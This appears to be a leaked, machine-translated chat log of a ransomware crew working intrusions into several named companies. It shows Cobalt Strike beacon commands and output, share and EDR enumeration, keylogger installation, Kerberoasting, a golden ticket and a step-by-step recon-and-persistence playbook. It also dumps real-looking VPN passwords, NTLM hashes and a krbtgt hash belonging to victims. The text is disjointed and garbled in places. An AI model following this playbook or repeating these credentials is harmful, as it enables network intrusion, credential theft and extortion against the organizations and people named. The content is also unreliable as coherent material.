M404dn IPC$ [--- Listable Shares ---] ADMIN$ C$ print$ [+] received output: Shares for HENDSTORAGE: [--- Unreadable Shares ---] Gina(HP Color LaserJet CP3525) Gina(HP LaserJet 400 M401dne) HP MFP477 QA Lab IPC$ Matt(HP LaserJet 400 M401dne) Warehouse Office MFP(HP LaserJet 400 MFP M425dn) Warehouse Office(HP LaserJet 400 M401dne) [--- Listable Shares ---] ADMIN$ Apps C$ D$ Distro E$ GPO_Installs InstallApps ISOs Maint Office print$ Shared Users ``and select different groups do we have admin rights there? ``` \30L71.rtpco.local\ADMIN$ - Remote Admin \30L71.rtpco.local\C$ - Default share \30L71.rtpco.local\IPC$ - Remote IPC I understand it correctly, do I have to check 415 machines by name in ad_compacts now? 
from different OU[ ](https://mediaeveryone.com/channel/general?msg=8gp4Z6s3knM7Z7iWp) didn't understand it and I asked for respawnsession failed at one moment I've played with both dir and lhome[ ](https://mediaeveryone.com/channel/general?msg=o6tMFScKZHG3cJJ6y) from different groups either it gives nothing or access is denied[ ](https://mediaeveryone.com/channel/general?msg=7nTdHajYQxDGJfPsA) 415there's jurl, username, password, click on the list, log in to the site, how do you get information from Lastpasa? how much access?? everywhereb access to the fs is denied and remot tula works, why is it vmic and even if even dir does not give vmic?dir[ ](https://mediaeveryone.com/channel/general?msg=DcCxwQPhssGgSCPLZ) only vmik checked? what does it say? Donald J. Trump (@realDonaldTrump) / Twitter - Mozilla Firefox ======= [control][ctrl] ``He also tweets it#ballymoregroup-com Found a VPN, took off the browser. the passwords from the browser to the VPN didn't work. Installed keylogger and since now on the screen lockscreen - there is a chance to catch a password. while looking in the files on the disk. SearchOutlook.exe not looking for shit.[ ](https://mediaeveryone.com/channel/general?msg=oWPnwwNseAH2uEowX) golden ticket done, found alive yes, check admin's comps (fs, ff) in #1-done-rtpcompany-com spawnas not working under any creeds, under the current polzakami took the balls off SharpShares: no listable shares besides print$ ShareFinder: where it says Remote Admin - it won't let me in in #waterway-com check passwords lastpass/logmein, except mharper'a I do not see anyone yet, at the same time watching the keyloggerBut no change, started looking for mozilla on computers where admins are pledged and check the password file from the keyloggerwrite what you have on progress not in that window) again some matyladno now look yyudshp who knows it)))) where it saves the log? no configurations...exactly there, i did not notice it in the toolchain saw the keylogger? 
is there a third-party keylogger worthy of attention? if @user7 has something, let it go there, i think everything is already there this conf) `rawint.com ` no dotsink? well, work once it came to what edition of the software, i think only sofos and winndef ` `. 16464 972 LockApp.exe x64 1 BALLYMOREGROUP\rpearce 3988 748 SavService.exe 5184 748 SAVAdminService.exe 5372 748 ALsvc.exe ``whenever there is a hardwindefc, see what else on ps see the red processes``. [+] Determining what EDR products are installed on localhost... [+] host called home, sent: 57 bytes [+] savonaccess.sys Found [+] 1 EDR Products Found! ====================== | Vendor Information | ---------------------- [+] Sophos Found! ``I noticed that edr kvetch does not show all through edr + psst tell me what AV + because your coba was the cleanest show session put your shelkodblya, I had in the old one for some reason came ...-you do not fly? so not yet took silkodblya) and I do not fly by the classical 20 minutes put the scanners do not sleep as well by the way come silkodblya + - preferably clean all coba have?+ + there are not even files AD in the confab, apparently a serious AB at the entrance to the baly recommend access to the VPN #ballymoregroup-com and here +1 together with @user7 + here one man # 1-done-rtpcompany-comobe already had two nets to work I, by the way, also seem to have gone stale I do not have clean kobe?add me in #evo-com:man_raising_hand: i'm in place:space_invader:hiprivWhat's the Mon by what time? 
Yeah, everyone yes, all:man_shrugging:a couple more restored to be sure in a long slip then lies:man_shrugging:then it should also reach the admin...the second as well knocks in the billd should reach if it goes first`` beacon> shell ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com [*] Tasked beacon to run: ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com [+] host called home, sent: 77 bytes [+] received output: Pinging asdasdasdsa.sadasdsadsa.kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=131ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 131ms, Maximum = 131ms, Average = 131ms `` hmm. the domain works...this is how to ping asdasdasdsa.sadasdsa.domain.com -n 1 I don't mean just check otherwise) `` beacon> shell ping -n 1 kalarada.com [*] Tasked beacon to run: ping -n 1 kalarada.com [+] host called home, sent: 53 bytes [+] received output: Pinging kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=131ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 131ms, Maximum = 131ms, Average = 131ms beacon> shell ping -n 1 www.kalarada.com [*] Tasked beacon to run: ping -n 1 www.kalarada.com [+] host called home, sent: 57 bytes [+] received output: Pinging www.kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=133ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 133ms, Maximum = 133ms, Average = 133ms I`m not sorry) test it) okay, do not touch the domains can not knock for other reasons if there are bots in the network on the backdoor admin - then the domains are alive directly from the car where you run) well, ping from where 
does not knock knew, but the fact that does not knock for 3 zakrepaty not know what?it means "it will" and if it gives out ipiniknado pinging level 3 domains it is very easy to check I only have 2) to check? or you do not have others? why? muncucfarfarisaa which ones are added?) I do not remember the other 2 domains have a mask ``` Adobe autoupdate#41162 1/22/2021 10:43:28 PM Running ``Let's change domains (there's no backups) there's one print server that's restored all the servers are important Why backups? ``` main.crispregional.org 10.1.0.22 https SYSTEM * CRHSBACKUP this is a new crispispisp version of the 10.1.1.22. if you want to copy and paste it into another crisp, it needs to be done before monday, i suggest we finish this today. 1. Gathering initial information about the domain and the environment - Full domain name - DCs list - LA\DA\EA - Password policy - PS - EDR - Systeminfo On the basis of this information we see what kind of network we are looking at: a workgroup with VPN, a lab, a work network. If you can't make a conclusion from step 1, go to step 2. 2. Collecting BP information - ADFind - ADFind trust If the total size of the files is more than 40mb, you need to put them into the archive. After analyzing the AD we make a conclusion about the network type. If it is a workgroup without a visible domain, we skip it and take the next network to work on. If a full-fledged network, move on 3. Gathering additional information about the domain and environment - Browser Dump - Seatbelt - kerberoast, asreproast - DuzzleUP - WinPEAS - Watson - GPP - ShareFinder - Check ZeroLogon all files in the process and logs you put in a folder with the name of the external network domain, under the names corresponding to the utilities you run. You pass the brute-force hashes to team lead 2 4. Additional actions. 
During ShareFinder run, we run persist on the entry point (ONLY IF YOU SUGGESTED IT) - generate a NEW build for EVERY run - hide dll in user folders (preferably appdata and as far away as possible) - run it, check if the dll is not deleted + staska appeared, write to me: hostname, startup rights all files are duplicated in the conf, as well as stored in a separate folder at your local location. Information about DC, LA, DA, EA, and all the passwords found in the process you put in a separate file creds.txt 5. If during or after the ShareFinder, as well as a quick brute-force hash, you get the opportunity to get out of the entry point, then by all means take advantage of it. Such a network gets priority and is not interrupted ``and check the login and passwords without a domain on itproping at least 1 successfulproping all pk from the group of the current user in the domain there is a user with the same name as this admin, but he is not active for a long time in this situation 2-2 is me who is so clever? user 2-2 beacon> shell net user GPJHelp [*] Tasked beacon to run: net user GPJHelp [+] host called home, sent: 47 bytes [+] received output: User name GPJHelp Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set ?4/?18/?2018 9:47:12 AM Password expires Never Password changeable ??4/?18/?2018 9:47:12 AM Password required No User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon ??4/?18/?2018 11:53:55 AM Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *None The command completed successfully. I don't think so, but his domain often drops out. Was there a VPN as well? Are there any requests going through? 
``` shell ping 192.168.30.42 Pinging 192.168.30.42 with 32 bytes of data: Ping statistics for 192.168.30.42: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), ````execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\hashes_rub_all.txt $krb5tgs$23$*Pwwadfssvc$gpj.loc$host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``Pass to brute-force write it down in the future and it was most likely disabled. The request will be processed at a domain controller for domain gpj.loc. User name GPJHelp Full Name GPJHelp Comment Helpdesk service account User's comment Country/region code 000 (System Default) Account active No Account expires Never Password last set ?3/?29/?2011 9:04:23 AM Password expires Never Password changeable ??3/?29/?2011 9:04:23 AM Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships Global Group memberships *Service Accounts *Domain Users I wanted to check access, but you have to do it if it is not a domain and it's a local account. user 2-3 beacon> shell dir \192.168.120.28\C$ [*] Tasked beacon to run: dir \192.168.120.28\C$ [+] host called home, sent: 54 bytes [+] received output: This user can't sign in because this account is currently disabled. user 2-3 beacon> shell dir \10.200.100.42\C$ [*] Tasked beacon to run: dir \\10.200.100.42\C$ [+] host called home, sent: 53 bytes [+] received output: This user can't sign in because this account is currently disabled. user 2-3 beacon> shell dir \\192.168.140.3\C$ [*] Tasked beacon to run: dir \\192.168.140.3\C$ [+] host called home, sent: 53 bytes [+] received output: This user can't sign in because this account is currently disabled. 
user 2-3 beacon> shell dir \\192.168.221.42\C$ [*] Tasked beacon to run: dir \\192.168.221.42\C$ [+] host called home, sent: 54 bytes [+] received output: This user can't sign in because this account is currently disabled. beacon> shell dir \\192.168.120.28\C$ [*] Tasked beacon to run: dir \\192.168.120.28\C$ [+] host called home, sent: 54 bytes [+] received output: This user can't sign in because this account is currently disabled. Check the validity of accesses on any host. dn:CN=GPJHelp,OU=Users,OU=Admins,DC=gpj,DC=loc >objectClass: top >objectClass: person >objectClass: organizationalPerson >objectClass: user >cn: GPJHelp >sn: Help >description: Helpdesk service account >givenName: GPJ >distinguishedName: CN=GPJHelp,OU=Users,OU=Admins,DC=gpj,DC=loc >instanceType: 4 >whenCreated: 20100203200249.0Z >whenChanged: 20180413150136.0Z >displayName: GPJHelp >uSNCreated: 14194 >memberOf: CN=Service Accounts,OU=Groups,OU=AuthManagement,DC=gpj,DC=loc >uSNChanged: 159601513 >name: GPJHelp >objectGUID: {BFFE42F1-B611-41BD-85FD-7E31917C25C0} >userAccountControl: 66050 >badPwdCount: 1 >codePage: 0 >countryCode: 0 >badPasswordTime: 132127983133838189 >lastLogoff: 0 >lastLogon: 0 >pwdLastSet: 129458774625564022 >primaryGroupID: 513 >objectSid: S-1-5-21-1795611735-3404200554-1966915844-1156 >accountExpires: 9223372036854775807 >logonCount: 0 >sAMAccountName: GPJHelp >sAMAccountType: 805306368 >userPrincipalName: GPJHelp@gpj.loc >lockoutTime: 131681052967595316 >objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=gpj,DC=loc >dSCorePropagationData: 20171016211900.0Z >dSCorePropagationData: 20171016205841.0Z >dSCorePropagationData: 20171016202841.0Z >dSCorePropagationData: 20171016202218.0Z >dSCorePropagationData: 16010714223649.0Z >lastLogonTimestamp: 129125338780643881 >msDS-SupportedEncryptionTypes: 0
Domain Controllers: Server Name IP Address ----------- ---------- [+] received output: DETMSDC01 192.168.11.42 LAXMSDC01 192.168.30.42 BNGMSDC01 192.168.110.42 SFOMSDC01 10.200.132.52 DETMSDC02 192.168.11.43 TOKMSDC01 192.168.90.6 SHARMSDC01 10.220.136.40 SYDMSDC01 192.168.101.42 SNGMSDC01 192.168.241.42 NYCMSDC01 10.201.36.42 AUSMSDC01 192.168.221.42 SFOAMSDC01 10.200.164.42 DENMSDC01 10.200.196.42 [+] received output: LONMSDC02 10.210.4.42 BEIMSDC02 192.168.120.28 SHAMSDC02 192.168.140.3 BOSMSDC01 10.200.228.42 HKGMSDC01 192.168.230.42 STURMSDC01 192.168.61.42 PLNMSDC02 10.200.4.42 MELMSDC01 10.220.68.42 SHARMSDC02 10.220.136.42 STURMSDC10 192.168.66.42 STURMSDC20 192.168.67.42 ROCMSDC01 10.200.100.42 SFO2MSDC03 10.200.132.42 STUGMSDC10 192.168.71.18 You can try it directly on the DC, 50% of the time it's a local admin there as well, it should roll on the pc from that group beacon> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain gpj.loc. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- ADAXES AMoultonADM bigfix ELittleADM JStriberADM pwwDirAdmin TMunsonADM The command completed successfully. 
``Password 5015T1ce ``opaaaah'' GPJHelp:1001:aad3b435b51404eeaad3b435b51404ee:6f2e383aaec00617d60f8a23e7fed5e2::: `````` Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: GPJHelp:1001:aad3b435b51404eeaad3b435b51404ee:6f2e383aaec00617d60f8a23e7fed5e2::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7f1bb527f5d3c495c3b53a4754d38ede::: ``timelysession come fly the session from here eishenu zerologon breaks dk yes, so you have to be careful here dka, that's what I meant) thank you)\Good morning maybe zerologon?mb not tehmozhet fit something like that from mylearning GSI there keylogger caught some password from Lisa ran through the configuration of the Lisa with Richard's creeds - the same everything, should connect and said that the error unknownhodu creeds not the best guides such always pick upa there among the obvious points could be an item with a solution to the problem) but there at the level of start the client enter login enter password there's no problem with it, just press okeyv sitbelt by richard so there's no codewhen this richard's machine isn't working right nowfind some dude's docs on iphone startup, maybe there's no help here either. Wed Oct 21 21:02:54 2020 OpenVPN 2.4.7 x86_64-w64-mingw32 [SSL (OpenSSL)] [LZO] [LZ4] [PKCS11] [AEAD] built on Apr 25 2019 Wed Oct 21 21:02:54 2020 Windows version 6.2 (Windows 8 or greater) 64bit Wed Oct 21 21:02:54 2020 library versions: OpenSSL 1.1.0j 20 Nov 2018, LZO 2.10 Wed Oct 21 21:02:54 2020 MANAGEMENT: TCP Socket listening on [AF_INET]127.0.0.1:25342 Wed Oct 21 21:02:54 2020 Need hold release from management interface, waiting... 
Wed Oct 21 21:02:55 2020 MANAGEMENT: Client connected from [AF_INET]127.0.0.1:25342
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'state on'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'log all on'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'echo all on'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'bytecount 5'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'hold off'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'hold release'
Wed Oct 21 21:02:56 2020 MANAGEMENT: CMD 'username "Auth" "richards"'
Wed Oct 21 21:02:56 2020 MANAGEMENT: CMD 'password [...]'
Wed Oct 21 21:02:56 2020 MANAGEMENT: >STATE:1603306976,RESOLVE,,,,,,
Wed Oct 21 21:02:56 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]50.202.106.2:9443
Wed Oct 21 21:02:56 2020 Socket Buffers: R=[65536->65536] S=[65536->65536]
Wed Oct 21 21:02:56 2020 Attempting to establish TCP connection with [AF_INET]50.202.106.2:9443 [nonblock]
Wed Oct 21 21:02:56 2020 MANAGEMENT: >STATE:1603306976,TCP_CONNECT,,,,,,
Wed Oct 21 21:04:56 2020 TCP: connect to [AF_INET]50.202.106.2:9443 failed: Unknown error

Yes. SOCKS definitely off?
Waiting, and again it's stuck on tcp_connect.
I thought chetokevsena, and the VPN, it seems, was meant as not in the network; it is external, so in the VPN you specify the address of their VPN server.
There are attacks to chase; I am not in their network.
Why? It is in the OpenVPN proxy I pointed out, not yours?
Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'proxy SOCKS 104.243.40.126 1337'
Yes.
Wed Oct 21 20:58:32 2020 MANAGEMENT: >STATE:1603306712,TCP_CONNECT,,,,,,
Wed Oct 21 21:00:32 2020 TCP: connect to [AF_INET]104.243.40.126:1337 failed: Unknown error
Is it responding? Am I working in it as I should be? Does it work?
What do you mean? Did it stop on tcp_connect, or did it crash?
It's going well so far, with no errors:
Wed Oct 21 20:58:29 2020 OpenVPN 2.4.7 x86_64-w64-mingw32 [SSL (OpenSSL)] [LZO] [LZ4] [PKCS11] [AEAD] built on Apr 25 2019
Wed Oct 21 20:58:29 2020 Windows version 6.2 (Windows 8 or greater) 64bit
Wed Oct 21 20:58:29 2020 library versions: OpenSSL 1.1.0j 20 Nov 2018, LZO 2.10
Wed Oct 21 20:58:29 2020 MANAGEMENT: TCP Socket listening on [AF_INET]127.0.0.1:25342
Wed Oct 21 20:58:29 2020 Need hold release from management interface, waiting...
Wed Oct 21 20:58:29 2020 MANAGEMENT: Client connected from [AF_INET]127.0.0.1:25342
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'state on'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'log all on'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'echo all on'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'bytecount 5'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'hold off'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'hold release'
Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'username "Auth" "richards"'
Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'password [...]'
Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'proxy SOCKS 104.243.40.126 1337'
Wed Oct 21 20:58:32 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]104.243.40.126:1337
Wed Oct 21 20:58:32 2020 Socket Buffers: R=[65536->65536] S=[65536->65536]
Wed Oct 21 20:58:32 2020 Attempting to establish TCP connection with [AF_INET]104.243.40.126:1337 [nonblock]
Wed Oct 21 20:58:32 2020 MANAGEMENT: >STATE:1603306712,TCP_CONNECT,,,,,,

And then start the VPN, and then close Proxifier.
Close the OVPN.
So, it is holding the thread in the Proxifier process; why is it still hanging?
Restart the OVPN client.
Stop. I started without Proxifier.
Just exactly: socket disconnected?
yes[ ](https://mediaeveryone.com/group/telecomlabsinc-com?msg=NjCvbpwBwHnhtoGr8) ?sox_rukkotryaskanu here above whats the same mistake without proxy I ran it with the same proxy and today I ran open a proxy in openopopen and forgot about it yesterday so I pointed proxy from cobalt in openopopen and downloaded the config from openopen? Wed Oct 21 20:50:52 2020 socks_handshake: TCP port read timeout expired ``Handsome guy, now there's a new problem with those craps. Target : autologon.microsoftazuread-sso.com UserName : richards@continuant.com Password : MyW0rdPassW0rd! CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 2/24/2020 11:30:58 AM Now it just asks for Credits. It's ok, I thought I should change my -name to something of my own. In cryptography, X.509 is a standard defining the format of public key certificates. X.509 certificates are used in many Internet protocols, including TLS/SSL, which is the basis for HTTPS, the secure protocol for browsing the web. They are also used in offline applications, like electronic signature ``What is verify-x509? Well, commas are used instead of slashes in config anyway. I've edited my config.ovpn file. There is a line like the following tls-remote "/C=Country/L=City/O=Company/CN=Name/emailAddress=email address" You have to replace the line with the following line verify-x509-name "C=Country, L=City, O=Company, CN=Name, emailAddress=email-address" ``try'' https://community.sophos.com/utm-firewall/f/network-protection-firewall-nat-qos-ips/93118/openvpn-tls-remote-deprecated-yet-used ``log: ``` Options error: Unrecognized option or missing or extra parameter(s) in lisa.ponsler@fife-utm.continuant.com.ovpn:6: tls-remote (2.4.7) Use --help for more information. ``said that everything is fucked up, look at the logs, what is tls-remote to it[ ](https://mediaeveryone.com/group/telecomlabsinc-com?msg=4FB6bhSRASxsyA6au) which one? 
I've tried it with all the codes that I threw above - error on the screenshot Attention pausestartthere are creeds in the search line ithelpdesk mail ``` tls-remote "C=us, L=Fife, O=Continuant, Inc, CN=FIFE-UTM.continuant.com, emailAddress=ithelpdesk@continuant.com" ``when deleting a string from the config asks for cresno with the existing configs it swears at the string is here open vpn through the eye of Sauron and hands search configs - empty while they do not see configs instead of enikonnect - cisco ip communicator should be in the prog files x86 - cisco - enikonnect asks for cres when connecting? just domain tried without specifying the domain? there are sessions on 3 machines richard lisa andrew lisa is alive and it only has OpenVPN, it has configurations, but no cres info on anyconnect should be at richard, still dead andrew barely got to touch it yesterday and it died a cowardly deserter's death SSL VPN IP address Https://207.225.113.146 Username/password dadmin/w3r3g00d ``` ``` SSL VPN (anyconnect) IP address : http:\\66.236.103.194 VPN clinet IP Range : 192.168.1.230-39 VPN username : vpnuser VPN user password : h4rdt0gu3ss ``` ``` SSL VPN Address Https://173.12.52.229 System administrator Usrname/password dadmin/w3r3g00d SSl VPN user midawivpn/m1daw1vpn ``Yeah searched for rdp/vnc? no found vg logins? not saved probably not think``` --- FireFox Credential (User: administrator.MISSME) --- Hostname: http://192.168.1.10 Username: admin Password: ``` Is it possible that password is blank? 
192.168.1.229:445 (platform: 500 version: 4.9 name: MFPB07F48 domain: WORKGROUP)
192.168.1.233:445 (platform: 500 version: 4.9 name: MFPAB870E domain: WORKGROUP)
192.168.1.237:445 (platform: 500 version: 4.9 name: MFPB37AD8 domain: WORKGROUP)
192.168.1.243:445 (platform: 500 version: 4.9 name: CANONC5035 domain: WORKGROUP)
192.168.1.247:445 (platform: 500 version: 4.9 name: SERVER-819751 domain: WORKGROUP)
192.168.1.252:445 (platform: 500 version: 4.9 name: MFPB43E92 domain: WORKGROUP)
192.168.1.253:445 (platform: 500 version: 4.9 name: MFPB316DC domain: WORKGROUP)
192.168.1.140:445 (platform: 500 version: 4.9 name: TIMEMACHINEBKUP domain: WORKGROUP)
192.168.1.155:445 (platform: 500 version: 4.9 name: MFP07330011 domain: WORKGROUP)
192.168.1.120:445 (platform: 500 version: 4.9 name: SERVER-T1 domain: WORKGROUP)
192.168.1.60:445 (platform: 500 version: 6.1 name: EMAILBACKUPS domain: WORKGROUP)
192.168.1.10:445 (platform: 500 version: 6.1 name: MM-VAULT-NEW domain: WORKGROUP)
192.168.1.222:445 (platform: 500 version: 6.1 name: MFPB4FDF5 domain: WORKGROUP)

Poorly, old (that's what I found).
Okay, it's a swamp, Macs. Time will not be wasted: break what you can reach and fuck it.
Usually on AFP (can't do anything about it if 445 is not available). FShuevod, there are a lot of them, and also the admin computers on them.
Dunno, on AFP it can be without SMB (these are Apple machines, fuck).
TIMEMACHINEBACKUP domain: WORKGROUP, EMAILBACKUPS domain: WORKGROUP, for example: they are outside the domain, it's not clear how they get there. Also, admins can get there through clients and not browsers.
If you looked at the hosts, it's outside the domain. Remember how you identified it?
but i'll check i don't think it's even here i found backups, but in the center no backups virtualization system priority anyway this shit isn't right ``` Serial Number: W8KMJ24BNHCR6CM Website Link: https://home.mcafee.com/secure/protected/login.aspx?rfhs=1 Login: thomas@aktn.com PW: $Mcafee1234# ``You can get ready, now I'll find the password from the AVDA, I threw it so I wouldn't lose it. [DC] 'MissMe.local' will be the domain [DC] 'MM-DC3.MissMe.local' will be the DC server [DC] Exporting domain 'MissMe.local' 502 krbtgt e7a33c4e6c4edc222481d99080ec3c08 514 4146 ELO-AE962551BC7$ 81639909f862f53089210fd95b8632eb 4096 2735 THOMAS-THINK$ 75b626032ebcada49315e028045d5879 4096 4135 ROYKOWN-THINK$ c7d508cda2e5903a4a6d5eca1102c500 4096 4152 IBM4-THINK$ 590ef9ae405c55f6590c56b962b5f439 4096 3716 ELD$ a290db25d845ecc3843ab2cc9c82f16e 4096 4145 THOMAS-HP-WORK$ 62d192174bd613b81f92b49d5e8235be 4096 2305 LASW01$ c23d996b31e6afd862214c7f54cf70 4096 1554 MISSME-F7082DDB$ 3b42fe51b694f829f865bbd7114fc143 4096 3638 HP20181167898$ d69f6b7c436ee14007b6fb5454f84cec 4096 4161 ROYKWON-HP$ 88f0acaf77f17e498dbb0076f7b664c5 4096 3690 AIMS-SVR$ 370a577c38663b023d5947e8018fc930 4096 4178 TM06_YORANDAGOM$ 54a09a85d93611b9b4eb2db588957584 4096 4182 STELLA-HOME$ 8c44fd32a091a5cd0e204bf1feeb5f4d 4096 4185 MEK-ACCT1VM$ 0b9fd6996556cc1f1ee2be2658b0c4bf 4096 4192 MEK-ACCT2VM$ 0897b83a3b3b31ba2f1fe2a869bce569 4096 4141 LASHOWROOM05$ 85a3d5a3eeacc605489ab043dfd8ae49 4096 2645 HQTMP08$ 4f093e3548a0b26ad70cf2affb99839a 4096 1610 MOD2User 2271cf353a840dfe25bb8fd2fe773cad 512 2730 HQTMP12$ ea8680c0181c316b270336b10a2103e2 4096 2642 HQTMP07$ 2296e463b7a2175bd36d573d12db7731 4096 2110 NYPC05$ b7c6bfa69a521a05ef19f985e14e8de8 4096 4227 HP196$ 6e5819beb5b7344cbdbb4d64789ab496 4096 2107 NYPC02$ 81f2b35b4335b519a50f9460a2648829 4096 2106 NYPC01$ cb2cfd14a2e22c6e28e98565c18d451e 4096 1138 JasonTak 20efb41d34a235754a4c9bb1bb15e7fe 66048 2043 SVAULT-SVR$ 648c9dae88921ee8ea18261daa0eb1d7 69632 5617 itmac$ 
c413964d5509a1457207eede89cf98b7 4096 4226 MMNY002$ 30969d0e639fe3cd4dd9bec921bcc5a6 4096 2626 HQTMP06$ 2e9cb30e176a3e638134bcda39f7dd59 4096 5624 hqmac015$ bf11ebbb7eee4c2f4fb71a6f9132c189 4096 3822 LASHOW03$ 3649c1d621939577c103c348fd7848b1 4096 3792 HQTMP04$ d9135a22a01082800e6c653c775a65b0 4096 4165 THOMAS-WORK-HP$ 0a571eeefc5f0e911477bd21ced146c3 4096 3814 TrentMaclean 32a861404177c2292b02d41a1ffd05fd 66050 5675 MEKMAIL-HP$ 57836ec1d7e243b5eaaf5c73b7338d6a 4096 5660 hqmac025$ b437f7f303714c9a910edfdbc7090f7c 4096 2702 HQTMP10$ 0fe96168d14f72e1aef67d86b0f31c3f 4096 4225 MMNY001$ 2843485c3817c7487534860c7bed0a2e 4096 3890 MMNY003$ cf7695d32c74c69772f09c825a07daea 4096 6119 joekim$ 865101b12e6702e23eb310255a1c7240 4096 4248 hqmac006$ ce9c7374d99168b69b71662f14f70bca 4096 5622 hqmac003$ 5654afcf073f3a72dda061fa70b49f8c 4096 6124 mek-mac01s-imac$ 97bf33692fb6720ce963b6462b55b24b 4096 5625 osxserver$ 3a2b06b5e4ed40693850b92f5b893452 4096 3924 hqmac016$ e1a7503caa1f6336aea07013bb0e2eeb 4096 6138 hqmac029s-mac$ 68bbda7d561942775d518d3cd9e5bf05 4096 3931 hqmac021$ 75b474ac45326761661ddefd88e2ca11 4096 6145 hqmac037$ 10659f2bece677b186aab29cc2814cba 4096 3802 LASHOW05$ 0f5a535d5c1603c022a2bb2804f2324f 4096 6140 hqmac030$ 8a7eb7d5e9a8337f389480061387f5a6 4096 3919 hqmac004$ 440de876a486b74a77f1891826c38b23 4096 6153 hqmac038$ d0941c78d5780d989b682a7efea6ab62 4096 4256 hqmac019$ 4851ea5d113e4eb17e79aac3c4330661 4096 3821 LASHOW02$ d199c6c8033e050d7aefd62b0d857552 4096 2736 LASHOW01$ f8f60bafc0496f5e30e5650adec96f12 4096 4224 LASHOW06$ 60e7daef67d101d5d38324d0b947c809 4096 3823 LASHOW04$ 97f8d9f46fc5a59f0ef703d8b1510e8b 4096 5723 SURFACERENTAL01$ b297cf14bdc1617d7993cc3003c7d9ca 4096 6128 HQT006$ 232ed08a47070f7ba9a38a5dc809b55a 4096 6117 hqmac027$ 85d54781b00a8f818b743e3ab932f660 4096 5676 THOMAS-HP$ c1fab19aac8fcf33d0f152f3b4551371 4096 1155 RoyKwon edde0a2302794d0af770ed7d15081005 66050 1176 SteveKim b841b54f0c6238dd30cd66fa2c1eee0f 66050 3628 NatalieN 
f2b77c7548eea308677a1357baa052bd 66050 6125 HQT003$ 9fde2eeb2c90a687c7ff2062ac68078c 4096 6113 it-macs-imac$ 5bf5f78f0da435f2d59be213633109c6 4096 6160 hqmac041$ d71ad5ab65c7b34c77f226e0cf0d4457 4096 4170 HQ121$ dea99309f148e950bd15700fb4f63354 4096 1397 YoungCho 2a811a6e4b55f7c19d146b73fd1dfe60 66048 4252 hqmac008$ a2cfb8f09cdb0f8c677236b823e163ec 4096 1145 EricChoi d1eec596185e0f634bab3761f5a86da8 66048 1162 MayHan 8f18cabbe2b0f33343ad4f35bb25f0a7 66050 3840 SunHeeLeem 53497e9ecf73893ab53e27ba682b20a5 66050 5639 Julikyun 84079b3db4b1e965a05f8aa7e1a90747 66050 3658 DaniWhang 06adc46626eb166163cd0f9c261bdcd8 66050 3665 DooyoungKim 4c1a588d4c19b174e32ae5e9c4d40577 66050 5629 CarolineLee e429408c826ffbeb486c4f66341438a6 66050 5771 MM-BOOK-17$ 34874ee6462fcea732311d3b371c54674 4096 3921 hqmac010$ 4473f0748637f3472e51d264becf27fa 4096 5644 hqmac022$ a945b5645541f6c15a03c19d9b26e3d0 4096 6187 KPNWH009$ b91cc44029ab92916ea5b2be1f03ae0e 4096 6188 KPNWH010$ 4f636d219b77e3ce032f917cc3f6927c 4096 2732 HQ054$ 3aafc4fc1c5896b69b49a0affe9e0efd 4096 4202 HQ163$ 0de0b6eac037cd47da8e40b192d3b346 4096 3855 HQ167$ d3dabad07fd4fc143eda83af97ce21fd 4096 4206 HQ170$ 493a52694f33d857d444662468750094 4096 4207 HQ171$ 6abcceddf37897ee28505913460206ca 4096 4209 HQ173$ a530d47426ce2d28f50880533921a8e0 4096 3863 HQ175$ cc32bb327c31d38e4690863bcf72ec36 4096 4217 HQ185$ f1fc9879ee531e25f813e63ba3385575 4096 4258 HQ224$ 0f29fc0252f5f99c40eec50712a2e2eb 4096 5613 HQ213$ 03462bba4de1e66757656fc33ed62424 4096 4233 HQ204$ ec89df2639eda50ff9f7027b0595d865 4096 4230 